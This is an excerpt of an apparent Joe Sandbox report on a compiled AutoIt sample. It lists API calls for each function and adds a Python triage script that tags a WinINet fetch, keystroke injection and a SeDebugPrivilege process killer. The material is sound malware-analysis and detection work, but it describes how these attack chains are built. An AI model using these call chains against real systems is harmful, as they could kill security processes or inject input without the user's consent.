                                        • SetEvent.KERNEL32(?), ref: 00C6C336
                                        • InternetCloseHandle.WININET(00000000), ref: 00C6C341
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                        • String ID:
                                        • API String ID: 3113390036-3916222277
                                        • Opcode ID: f454c66824c2f7989d3177e3469812711ac50874a35e3e20954c83299b905eb1
                                        • Instruction ID: c190248cdba041b541bc105011a2992bbb28560482fb52d9787014bb79b14f62
                                        • Opcode Fuzzy Hash: f454c66824c2f7989d3177e3469812711ac50874a35e3e20954c83299b905eb1
                                        • Instruction Fuzzy Hash: 973169B1600608AFD7319FA598C8BBB7BFCEB49744B10852EF496D2210DB34DE049B75
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C33AAF,?,?,Bad directive syntax error,00C8CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C598BC
                                        • LoadStringW.USER32(00000000,?,00C33AAF,?), ref: 00C598C3
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C59987
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: HandleLoadMessageModuleString_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                        • API String ID: 858772685-4153970271
                                        • Opcode ID: 530b1d255059fea2945a1f84dd570f332035304a9f9a11c9cf1df67227373048
                                        • Instruction ID: dbd1498347e8138c49e5a4143b2587f10bc72e79618b0fac172b48c29959f8e6
                                        • Opcode Fuzzy Hash: 530b1d255059fea2945a1f84dd570f332035304a9f9a11c9cf1df67227373048
                                        • Instruction Fuzzy Hash: 09216D3180021EEBCF11EF90CC46EEE77B5FF18741F0844A9F615620A2EA359658DB24
                                        APIs
                                        • GetParent.USER32 ref: 00C520AB
                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00C520C0
                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C5214D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameParentSend
                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                        • API String ID: 1290815626-3381328864
                                        • Opcode ID: 705e9af9db857f6887ddcc30a7de4cdc9535ef7211508bc534a6d20b071250cc
                                        • Instruction ID: 35381ced411041e7b16102a06c192a39e8cab9ab7881aaa883cf2f1e4e4a4d4f
                                        • Opcode Fuzzy Hash: 705e9af9db857f6887ddcc30a7de4cdc9535ef7211508bc534a6d20b071250cc
                                        • Instruction Fuzzy Hash: B211E77A684B06BAF60522219C06EEF37DCCF06325F200026FE05A50D2FA616D85765C
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                        • String ID:
                                        • API String ID: 1282221369-0
                                        • Opcode ID: 0ea4ad76c75efa471aa9e4b95e87b534c61f96f2ba137ad27374a7c76f17bd8c
                                        • Instruction ID: 4c7a97be5b6ca221421b7c68ef1f8376bd43d32dfb3f0b2f3d47b5fb67df7019
                                        • Opcode Fuzzy Hash: 0ea4ad76c75efa471aa9e4b95e87b534c61f96f2ba137ad27374a7c76f17bd8c
                                        • Instruction Fuzzy Hash: 6E615671904320AFDB21AFF8FDC1B6E7BA5AF05320F14026DF81697A82E7319E419790
                                        APIs
                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00C46890
                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00C468A9
                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C468B9
                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00C468D1
                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C468F2
                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C08874,00000000,00000000,00000000,000000FF,00000000), ref: 00C46901
                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C4691E
                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C08874,00000000,00000000,00000000,000000FF,00000000), ref: 00C4692D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                        • String ID:
                                        • API String ID: 1268354404-0
                                        • Opcode ID: ce716374a2ca7f7f6af46fa528f42fd1af903442dca89cfb3456b2850a584f7a
                                        • Instruction ID: a976a956d36ec26215d2624354507c164a56d23c7af1600eae055806ca46b547
                                        • Opcode Fuzzy Hash: ce716374a2ca7f7f6af46fa528f42fd1af903442dca89cfb3456b2850a584f7a
                                        • Instruction Fuzzy Hash: 12517870600209EFDB20CF25CC95FAA7BB5FB59760F108528F992972E0DB70EA94DB50
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C6C182
                                        • GetLastError.KERNEL32 ref: 00C6C195
                                        • SetEvent.KERNEL32(?), ref: 00C6C1A9
                                          • Part of subcall function 00C6C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C6C272
                                          • Part of subcall function 00C6C253: GetLastError.KERNEL32 ref: 00C6C322
                                          • Part of subcall function 00C6C253: SetEvent.KERNEL32(?), ref: 00C6C336
                                          • Part of subcall function 00C6C253: InternetCloseHandle.WININET(00000000), ref: 00C6C341
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                        • String ID:
                                        • API String ID: 337547030-0
                                        • Opcode ID: 0f89c1ace0c2dbe9143c945a64d1627d52c3df5b440ee24fd18ee2defd7b1c5a
                                        • Instruction ID: 4d691ec8f89e512fe6e1bc4cd7fe1cec0d03d321c2a1d0b1aacbb9e66c99e711
                                        • Opcode Fuzzy Hash: 0f89c1ace0c2dbe9143c945a64d1627d52c3df5b440ee24fd18ee2defd7b1c5a
                                        • Instruction Fuzzy Hash: BB315C71600605AFDB319FA5DCD4B7ABBF9FF19300B14842DF9AA82610D735E914ABA0
                                        APIs
                                          • Part of subcall function 00C53A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C53A57
                                          • Part of subcall function 00C53A3D: GetCurrentThreadId.KERNEL32 ref: 00C53A5E
                                          • Part of subcall function 00C53A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C525B3), ref: 00C53A65
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C525BD
                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C525DB
                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C525DF
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C525E9
                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C52601
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C52605
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C5260F
                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C52623
                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C52627
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                        • String ID:
                                        • API String ID: 2014098862-0
                                        • Opcode ID: 63a1f5f56e4c59659d0e269bbe26fec6ec58b3216c796a337032a38b9a81f875
                                        • Instruction ID: 7dc5ec650bba27f6092f93b41a4f9e4b1341097757f49853e9fbd3957956805d
                                        • Opcode Fuzzy Hash: 63a1f5f56e4c59659d0e269bbe26fec6ec58b3216c796a337032a38b9a81f875
                                        • Instruction Fuzzy Hash: 5301B131290650BBFB2067699CCEF5D3F99DB4AB52F100011F718AE0D5C9F224889A7D
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C51449,?,?,00000000), ref: 00C5180C
                                        • HeapAlloc.KERNEL32(00000000,?,00C51449,?,?,00000000), ref: 00C51813
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C51449,?,?,00000000), ref: 00C51828
                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00C51449,?,?,00000000), ref: 00C51830
                                        • DuplicateHandle.KERNEL32(00000000,?,00C51449,?,?,00000000), ref: 00C51833
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C51449,?,?,00000000), ref: 00C51843
                                        • GetCurrentProcess.KERNEL32(00C51449,00000000,?,00C51449,?,?,00000000), ref: 00C5184B
                                        • DuplicateHandle.KERNEL32(00000000,?,00C51449,?,?,00000000), ref: 00C5184E
                                        • CreateThread.KERNEL32(00000000,00000000,00C51874,00000000,00000000,00000000), ref: 00C51868
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                        • String ID:
                                        • API String ID: 1957940570-0
                                        • Opcode ID: 97a6337d3fb828e47a0ddcdae450b0cb63d5d64a91a3d5beacf1d4f35a00eae9
                                        • Instruction ID: cced73220db8500c0f477401c624e48906ccb75ed007e0ef5060b492ab506eed
                                        • Opcode Fuzzy Hash: 97a6337d3fb828e47a0ddcdae450b0cb63d5d64a91a3d5beacf1d4f35a00eae9
                                        • Instruction Fuzzy Hash: E901A8B5240308BFE610ABA5DCCDF6F3BACEB89B11F014411FA05DB2A1DA719C108B34
                                        APIs
                                          • Part of subcall function 00C5D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00C5D501
                                          • Part of subcall function 00C5D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00C5D50F
                                          • Part of subcall function 00C5D4DC: CloseHandle.KERNEL32(00000000), ref: 00C5D5DC
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C7A16D
                                        • GetLastError.KERNEL32 ref: 00C7A180
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C7A1B3
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C7A268
                                        • GetLastError.KERNEL32(00000000), ref: 00C7A273
                                        • CloseHandle.KERNEL32(00000000), ref: 00C7A2C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 2533919879-2896544425
                                        • Opcode ID: de9a2d7e24b5a5e128df442013688a8d4fd70f49892e8b8a4a043712379b1275
                                        • Instruction ID: c5d3faae3b4bf2e36bcba97d6f983e4c6088be637be96db8f210ce2c05c8f991
                                        • Opcode Fuzzy Hash: de9a2d7e24b5a5e128df442013688a8d4fd70f49892e8b8a4a043712379b1275
                                        • Instruction Fuzzy Hash: 58618E31204242AFD710DF19C494F29BBE1AF84318F54C49CE46A8B7A3C776ED89CB96
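Three of the function blocks above only make sense when the calls are read as a chain: the WinINet pair (InternetConnectW at 00C6C182 with the InternetOpenUrlW subcall at 00C6C272, an HTTP fetch with no browser involved), the keystroke sequence at 00C525BD..00C52627 (AttachThreadInput in the 00C53A3D subcall, then PostMessageW with 0x0100 WM_KEYDOWN / 0x0101 WM_KEYUP and wParam 0x25 VK_LEFT / 0x27 VK_RIGHT, i.e. keys posted straight into another thread's input queue), and the process killer at 00C7A16D..00C7A2C4 (a Toolhelp32 process walk, OpenProcess with dwDesiredAccess 0x1 = PROCESS_TERMINATE, TerminateProcess, next to the SeDebugPrivilege string that lets it reach protected processes). Since the report identifies the binary as a compiled AutoIt script, these are Win32 wrappers inside the AutoIt runtime rather than the dropper's own logic, so what a triager needs to recognise is the chain, not any one call. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses function blocks in exactly the line layout this page uses and tags those three chains. The sample blocks are abridged copies of the listings above; the tagging rules and the small Win32 constant tables are my own assumptions, not Joe Sandbox signatures.

```python
"""Triage helper for the per-function API listings on this page (added example).

Not part of the Joe Sandbox report or of the analysed sample. It parses the
line layout the report uses ("• Api.MODULE(args), ref: addr", a
"Part of subcall function" prefix for callees, "• String ID: a$b" for the
strings) and tags call chains worth a second look. The sample blocks are
abridged copies from this page; the rules and constant tables are my own.
"""
import re
from dataclasses import dataclass
from typing import Optional

CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<strs>.*)$")
WM_NAMES = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP"}  # Win32 message ids (assumed from the SDK)
VK_NAMES = {0x25: "VK_LEFT", 0x27: "VK_RIGHT"}         # virtual-key codes
PROCESS_TERMINATE = 0x0001                             # OpenProcess access right


@dataclass
class Call:
    api: str
    module: str
    args: tuple
    ref: str
    callee: Optional[str]  # set when the report attributes the call to a subcall


def hex_arg(arg: str) -> Optional[int]:
    """The report prints unresolved arguments as '?'; those decode to None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def parse_block(text: str):
    """Return (calls, strings) for one function block in the report's layout."""
    calls, strings = [], []
    for line in text.splitlines():
        if m := CALL_RE.match(line):
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            calls.append(Call(m["api"], m["mod"], args, m["ref"], m["callee"]))
        elif s := STRING_RE.match(line):
            strings.extend(p for p in s["strs"].split("$") if p.strip())
    return calls, strings


def decode_keystrokes(calls):
    """Name the key messages posted via PostMessageW (wParam is the virtual key)."""
    out = []
    for c in calls:
        if c.api == "PostMessageW" and len(c.args) >= 3 and hex_arg(c.args[1]) in WM_NAMES:
            out.append(f"{WM_NAMES[hex_arg(c.args[1])]}({VK_NAMES.get(hex_arg(c.args[2]), '?')})")
    return out


def classify(calls, strings):
    """Tag chains that matter for triage; the rules are assumptions, not Joe Sandbox signatures."""
    apis = {c.api for c in calls}
    tags = []
    # Toolhelp walk -> OpenProcess -> TerminateProcess is a process killer; the first
    # OpenProcess argument is dwDesiredAccess, and 0x1 is PROCESS_TERMINATE.
    if {"CreateToolhelp32Snapshot", "OpenProcess", "TerminateProcess"} <= apis:
        wants_kill = any(c.api == "OpenProcess" and c.args and hex_arg(c.args[0]) == PROCESS_TERMINATE
                         for c in calls)
        tag = "process-kill" + ("(PROCESS_TERMINATE)" if wants_kill else "")
        if "SeDebugPrivilege" in strings:  # with this privilege it can open protected processes
            tag += "+SeDebugPrivilege"
        tags.append(tag)
    # AttachThreadInput plus posted key messages: synthetic keystrokes delivered into
    # another thread's input queue rather than typed through the keyboard driver.
    keys = decode_keystrokes(calls)
    if "AttachThreadInput" in apis and keys:
        tags.append("keystroke-injection:" + " ".join(keys))
    # A WinINet session plus URL open is an HTTP(S) fetch with no visible browser.
    if apis & {"InternetConnectW", "InternetOpenUrlW", "InternetReadFile"}:
        tags.append("wininet-fetch")
    return tags


# Sample blocks: abridged copies of three function listings on this page.
PROCESS_KILL = """
• Part of subcall function 00C5D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00C5D501
• Part of subcall function 00C5D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00C5D50F
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C7A16D
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00C7A268
• String ID: SeDebugPrivilege
"""
KEY_INJECT = """
• Part of subcall function 00C53A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C525B3), ref: 00C53A65
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00C525BD
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C525DB
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C52601
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C52623
• String ID:
"""
WININET = """
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C6C182
• Part of subcall function 00C6C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C6C272
"""


def triage(blocks):
    """Map block name -> tags; a block with no covered chain gets an empty list."""
    return {name: classify(*parse_block(text)) for name, text in blocks.items()}
```

Paste any other function block from this report into `triage` to check it; the GUI plumbing that makes up most of this listing (LoadIconW, CreateFontW, menu and list-view messages) comes back with an empty tag list, which is the intended result.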
                                        APIs
                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C83925
                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00C8393A
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C83954
                                        • _wcslen.LIBCMT ref: 00C83999
                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C839C6
                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C839F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window_wcslen
                                        • String ID: SysListView32
                                        • API String ID: 2147712094-78025650
                                        • Opcode ID: db56b93c514575eeea194c63ba4518c1b78759d29193eff8796ddb8ad9bca318
                                        • Instruction ID: 379a4a7d9a1f43132f8c3ee26b8cf2cba0f39a573f1cec6972c9e0b13ec96c01
                                        • Opcode Fuzzy Hash: db56b93c514575eeea194c63ba4518c1b78759d29193eff8796ddb8ad9bca318
                                        • Instruction Fuzzy Hash: 5741B471A00218ABDF21AF64CC49FEE77A9EF08754F101526F958E7281D771DE84CB94
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C5BCFD
                                        • IsMenu.USER32(00000000), ref: 00C5BD1D
                                        • CreatePopupMenu.USER32 ref: 00C5BD53
                                        • GetMenuItemCount.USER32(00F16468), ref: 00C5BDA4
                                        • InsertMenuItemW.USER32(00F16468,?,00000001,00000030), ref: 00C5BDCC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                        • String ID: 0$2
                                        • API String ID: 93392585-3793063076
                                        • Opcode ID: 8aeaeb0e4155ec14cfad95719cf270ba448203795566d246548e109db283942d
                                        • Instruction ID: bdae95e3eb2d7996d062f2473d50107a812611284d9d431ea9fd1463ad558ec8
                                        • Opcode Fuzzy Hash: 8aeaeb0e4155ec14cfad95719cf270ba448203795566d246548e109db283942d
                                        • Instruction Fuzzy Hash: 12519F786002099BDF10CFA9D8C4BAEBFF4AF55316F144119FC2197294D770AE88CB69
                                        APIs
                                        • LoadIconW.USER32(00000000,00007F03), ref: 00C5C913
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: IconLoad
                                        • String ID: blank$info$question$stop$warning
                                        • API String ID: 2457776203-404129466
                                        • Opcode ID: 49e0ddc8f4fd4a894354806fe0c7ce163f9adb87bda2ee44541677cb0c68ddae
                                        • Instruction ID: bdcee9cb4346db4cab40dc48035e8b3840773f341f20586b922940f0baa1b374
                                        • Opcode Fuzzy Hash: 49e0ddc8f4fd4a894354806fe0c7ce163f9adb87bda2ee44541677cb0c68ddae
                                        • Instruction Fuzzy Hash: D6112B3A689306BEA7045B55DCC2DEE679CDF15716B20003AF900A62C2DB745EC4726C
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$LocalTime
                                        • String ID:
                                        • API String ID: 952045576-0
                                        • Opcode ID: 29de0a561e2936079cb176f1468186fe531836fb807ee057e2fb618e96556b31
                                        • Instruction ID: f09dfa13950b7b6f57bc5b5ad3455a6fb8d9daed71c851a9b167b4e070a4e988
